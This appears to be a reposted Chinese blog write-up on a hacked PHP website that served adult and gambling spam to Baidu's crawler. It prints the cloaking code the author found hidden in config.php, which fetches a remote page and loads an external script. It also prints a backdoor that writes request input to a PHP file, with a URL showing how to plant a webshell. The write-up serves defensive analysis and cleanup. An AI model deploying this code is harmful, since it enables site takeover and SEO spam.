您当前的位置:首页 > 电脑百科 > 安全防护 > 木马

网站挂马劫持经典案例分析「黑链清除思路」

时间:2022-11-21 09:15:31  来源:今日头条  作者:hacker网络

劫与被劫的网站遇过不少,时隔一年左右今天偶然又遇到一位网友求助的网站劫持问题,因为这个问题我竟然没有直接分析出挂马方式,因为稍微有点特别今天想详细的给大家分解一下常规挂马方式与清理思路。

网站挂马劫持的必然性

一般情况下你的网站并不是被特地入侵的,一般出于报复专门入侵你的网站也不会明目张胆的来劫持。

所以一般网站劫持会被用来发布灰色广告,或者被用来做黑帽seo。之所以你的网站被入侵,是挂马者使用批量getshell工具,根据某个漏洞来批量拿到具有相同漏洞的网站,然后再将相关劫持代码加入到你的网站程序中,而这一系列动作都是用工具批量完成。

其实在我看来,如果发现你的网站被挂马劫持,你其实可以乐观一点,起码你会知道你的网站存在严重的漏洞,却只是被工具劫持了,而不是被同行所利用,如果被专门的入侵者拿下,一般就不会简简单单的给你挂个马了,具体会严重的什么程度?这要看心情了,不开玩笑,而恰巧你又不太懂,如果木马隐藏的好,这匹马将伴随你终身,白头到老。

挂马症状

长话短说,一般你会在搜索结果搜索相关关键词,或者自己的网址,看到的标题可能不是自己的网站标题,点击进去可能会跳转到其他地方,或者进去后发现网站已物是人非。

如:

 

本来是一个PS网站标题变成羞羞的内容,而内容已经不(wo)堪(hen)入(xi)目(huan)

劫持分析

 

这种情况很明显挂马脚本对user-agent进行了判断,如果user-agent是百度蜘蛛,那么将返回广告。

一般会在网站程序插入JS,或者在php或者其他程序中插入代码,如果是js,一般只要远程调用一个就可以实现劫持,插入代码量很少。

上面说到的这个凤楼……呸,是PS网我一开始习惯性的判断为js劫持。于是我往着错误的方向开始了分析之旅。

第一步:审核元素中查看网络连接

 

网站正常打开的时候先看看没有加载异常的脚本

 

其中加载的js都打开简单看下没有发现异常的脚本,这时候就有点慌了啊,没有引入外部脚本,那就可能隐藏在现有的JS中,一般隐藏也是加密后的,比较难以发现,于是每个js文件按个检查一遍,依旧没有任何发现。

第二步:抓包分析

第一步没有直接分析出来,一般要么马隐藏的深,要么就是根本不是用的JS,那么需要抓包分析,怎么抓?这里就不说那么多了,可以在我以前的文章中找找。

先重现跳转的情景:

设置浏览器user-agent 为百度蜘蛛,这里我祭上一个超级好用的chrome插件

 

先用burpsuite抓一下看看,不过要先配置下不过滤JS脚本,

 

配置好代理,回车,走你

 

get首页,肯定没毛病,forward一下,这一下就相当重要了,如果下一步抓到js,首页还没跳,说明js搞鬼,而真相就是……没抓到js,出来直接抓到一个html页面,这个页面却是404,然后篡改的首页直接蹦出来了!

 

这说明?

说明程序直接在加载首页文件,也就是index.php的时候就开始捣鬼了。

至此可以判断为php挂马,在前端寻觅已经没有什么有用信息了。

第三步:找木马

这时候妹纸把网站程序源码包发过来了,ps:妹纸防备着呢,不给服务器权限,但是给了源码还是给了一切啊!虽然没有什么可利用的地方,但我起码知道里面绝对藏着shell呢!

一般挂马程序都是会直接把黑链代码插到index.php中,不会判断太多,这种情况出现在企业站中比较多,所以很自然的打开index.php,发现没有异常,也没有include异常php文件。

看到这里瞬间觉得这个套路还是有点深度的,起码没那么明显。

继续找加载的文件,这时候脑洞大开,直接去找数据库配置文件,然后就这么结束了这段捉马旅程,没错,马就在config.php文件中

<?php
if (ereg("http://www.bAIdu.com/search/spider.htm", $_SERVER ["HTTP_USER_AGENT"])) {
$file = file_get_contents('http://z.*****.com/jie/70.html');
echo $file;
exit;
}
if(stristr ($_SERVER['HTTP_REFERER'],"http://www.baidu.com")) {
echo "<script language='JAVAscript' src='http://z.sloufeng.com/jc.js'></script><br/>";
exit;
}
?>

简单分析一下,这已经是最简单的劫持代码了,判断user-aget 如果是百度蜘蛛,把网页:http://z.******.com/jie/70.html内容输出,没错,这里面就是你想要的凤楼信息;然后判断referer是否为www.baidu.com,是的话加载下面的js,这个js里面又是一层判断,弹出其他页面,反正就是业务繁多,还有菠菜等页面。

其实我没有找太多相关的php文件,因为很明显这个马就是批量实现的,程序也不会智能的过分把马藏那么深,数据库文件肯定要加载的,结果就在里面,而且都没有加密,差评!

第四步:找shell

下面就是找shell了,我没有详细的去找,只是在同目录下发现一个后门,挺简单 的

<?php
$dq = fopen($_SERVER["DOCUMENT_ROOT"].'/config/jc.php','w+');
fwrite($dq,$_GET['msg']);
?>


www.xxx.com/config/file.php?msg=一句话木马

这样就将一句话写到该目录下jc.php
 

题外话:这个凤楼广告竟然没有放任何联系方式和网址!意义何在?差评!

先就这些吧



Tags:挂马   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
风靡一时的壁挂马桶为何会跌下神坛?原因很现实,这些问题太突出
什么是壁挂马桶?其实壁挂式马桶,就是把马桶挂在墙面上,所以也叫挂墙式马桶。 与传统的落地式马桶相比,它最大的优势就是无地面的卫生死角,而且安装后简洁大方,颜值颇高。因此,也非...【详细内容】
2023-04-18  Search: 挂马  点击:(145)  评论:(0)  加入收藏
网站挂马劫持经典案例分析「黑链清除思路」
劫与被劫的网站遇过不少,时隔一年左右今天偶然又遇到一位网友求助的网站劫持问题,因为这个问题我竟然没有直接分析出挂马方式,因为稍微有点特别今天想详细的给大家分解一下常规...【详细内容】
2022-11-21  Search: 挂马  点击:(388)  评论:(0)  加入收藏
网站被挂马怎么解决
 网站被挂马后,我们打开的页面重则整个页面都被篡改为对方的页面,轻则打开看不出变化实际上在搜索引擎我们的标题和描述都被不法分子修改了,不看源代码我们都不能够轻易地察觉...【详细内容】
2022-11-09  Search: 挂马  点击:(270)  评论:(0)  加入收藏
网站被挂马植入了违规内容 导致被新网拦截的处理
某上海客户的家具网站最近被新网拦截了,直接输入网站域名访问提示:当前链接地址或网站因含有违规内容,暂时无法访问。目前客户做了百度竞价推广,一天消费在500左右,由于网站打不...【详细内容】
2022-07-07  Search: 挂马  点击:(207)  评论:(0)  加入收藏
网页挂马的原理和实现方式,看完这边文章我就不信你还不会
今天,有一位网友问了我一个问题,他自己已经有了网站了,现在他想做成“挂马”这种网站,只要打开它,电脑就有可能感染木马病毒。木马是需要触发才有效果的,触发条件:要么欺骗用户主动...【详细内容】
2022-06-13  Search: 挂马  点击:(717)  评论:(0)  加入收藏
网站被黑客挂马了怎么办
各位小伙伴们大家好。今天给大家分享一个事情,就是我客户的企业小站被黑客挂马了,那现在是2022年的2月初假期期间平时也不怎么打开那个小站,好,在2月2号的时候闲来无事点开看一...【详细内容】
2022-03-04  Search: 挂马  点击:(126)  评论:(0)  加入收藏
网站防止被挂马之静态文件
今天教大家一招,解决网站中静态文件被挂木马的问题。其实很简单,我们只要找到网页中使用的所有的这个JS脚本,然后把它替换成静态的连接地址,这样子的话别人就没有办法去修改这些...【详细内容】
2022-03-03  Search: 挂马  点击:(114)  评论:(0)  加入收藏
网站被挂马导致SEO排名下降
昨天我的网站出现了问题,我有一个医疗设备的网站,然后就是百度搜索,你百度搜索关键词后,然后出来了一个出来我的网站,但是他点击进去以后,他直接跳转到一个游戏界面了,然后我问我的...【详细内容】
2022-03-02  Search: 挂马  点击:(152)  评论:(0)  加入收藏
网站被XSS攻击挂马的危害
大家可能也会遇到过一些情况,比如一些企业网站或流量比较大的网站都会出现被跳转到菠菜违法广告。网页挂马的这种形式,比如说它可以生成JS代码,然后给你挂一个XSS跨站攻击这样...【详细内容】
2022-03-02  Search: 挂马  点击:(384)  评论:(0)  加入收藏
网站被挂马的解决方法有哪些
网站被挂马的解决方法有哪些呢?今天就有企友通-网站优化公司的技术人员给大家介绍一下,希望在站长们在操作时可以更好的帮到你们。1、第一步打开网站被黑链接:看看地址栏链接中...【详细内容】
2020-12-25  Search: 挂马  点击:(335)  评论:(0)  加入收藏
▌简易百科推荐
苹果“安全”神话破灭?!iOS首次出现木马病毒
一直以来,iOS系统都以“安全性极高”闻名手机圈。在封闭软硬件生态加持下,iOS确实要比安卓系统更安全点。但是,小雷要说但是了嚯,最近iOS却首次出现了木马病毒。图源:苹果近日,在...【详细内容】
2024-02-19    雷科技  Tags:木马   点击:(66)  评论:(0)  加入收藏
新型恶意软件曝光:可绕过微软SmartScreen,窃取用户敏感信息
IT之家 1 月 17 日消息,趋势科技近日发布安全公告,发现了名为 Phemedrone Stealer 的高危恶意软件,可以绕过微软 Windows 10 和 Windows 11 系统中的 Defender SmartScreen,窃取...【详细内容】
2024-01-17  IT之家    Tags:恶意软件   点击:(89)  评论:(0)  加入收藏
Chameleon 恶意木马曝光,伪装成谷歌 Chrome 浏览器等应用
IT之家 12 月 26 日消息,安全公司 Threat Fabric 日前曝光了一款名为“Chameleon”的恶意木马,该木马通常伪装成谷歌 Chrome 浏览器及部分银行应用,安装后便会在后台持续录制受...【详细内容】
2023-12-26    IT之家  Tags:恶意木马   点击:(91)  评论:(0)  加入收藏
手机中了木马病毒怎么办?
网络安全问题也日益突出。其中,手机中了木马病毒是一种常见的安全威胁。木马病毒是一种恶意软件,通常通过下载不明应用、点击恶意链接等方式传播,对手机和个人信息安全造成严重...【详细内容】
2023-12-22  小笣子的二两生活    Tags:木马病毒   点击:(130)  评论:(0)  加入收藏
揭开勒索软件LostTrust的神秘面纱
勒索软件LostTrust一直被安全社区认为是MetaEncryptor勒索软件的“换壳”产品,因为它们几乎使用了相同的数据泄露网站和加密程序。LostTrust勒索软件于2023年3月开始积极活动...【详细内容】
2023-11-02  FreddyLu666  微信公众号  Tags:勒索软件   点击:(189)  评论:(0)  加入收藏
12种常见的恶意软件类型与防范建议
自从计算机技术被广泛使用以来,恶意软件就一直以某种形式存在,但其存在的类型在不断发展演变。如今,随着人类社会数字化程度的不断提升,恶意软件已经成为现代企业组织面临的最...【详细内容】
2023-10-26  安全牛  微信公众号  Tags:恶意软件   点击:(177)  评论:(0)  加入收藏
防不胜防!黑客使用转码域名在谷歌上投放钓鱼网站 看不出任何差别
谷歌搜索上的各种恶意软件和钓鱼网站广告屡见不鲜,这种操作手法已经相当成熟,都是先做一个看似合规的网站去投放广告,等谷歌审核通过了再把落地页修改为恶意内容。之前蓝点网已...【详细内容】
2023-10-23  区块软件开发    Tags:钓鱼网站   点击:(66)  评论:(0)  加入收藏
macOS窃密木马分析,你还敢轻易下载mac破解软件吗?
0x01 事件简介近期,在进行macOS终端威胁狩猎时,发现了一例macOS终端窃密木马,经过深入分析发现该木马专门针对macOS,会从受害者的机器上窃取大量敏感信息,包括浏览器自动填充...【详细内容】
2023-09-27  M_Altman  FreeBuf.COM  Tags:木马   点击:(276)  评论:(0)  加入收藏
什么是Spyware?加密货币中的Spyware有多危险?
作者:BTC_Chopsticks什么是 spyware?Spyware 是一种在后台运行的恶意软件,经过编程后可以跟踪和记录受感染设备上的活动并收集有关用户的个人信息。 然后,这些信息会被发送给攻...【详细内容】
2023-08-07    新浪网  Tags:Spyware   点击:(281)  评论:(0)  加入收藏
勒索软件伪装成Windows更新,可加密文件、删除备份
IT之家 7 月 10 日消息,近日一种名为“Big Head”的勒索软件正在伪装成 Windows 更新来感染用户的电脑,不仅能加密文件,还能删除备份,这种恶意软件的两个变种已经被安全研究机构...【详细内容】
2023-07-11    IT之家  Tags:勒索软件   点击:(287)  评论:(0)  加入收藏
站内最新
站内热门
站内头条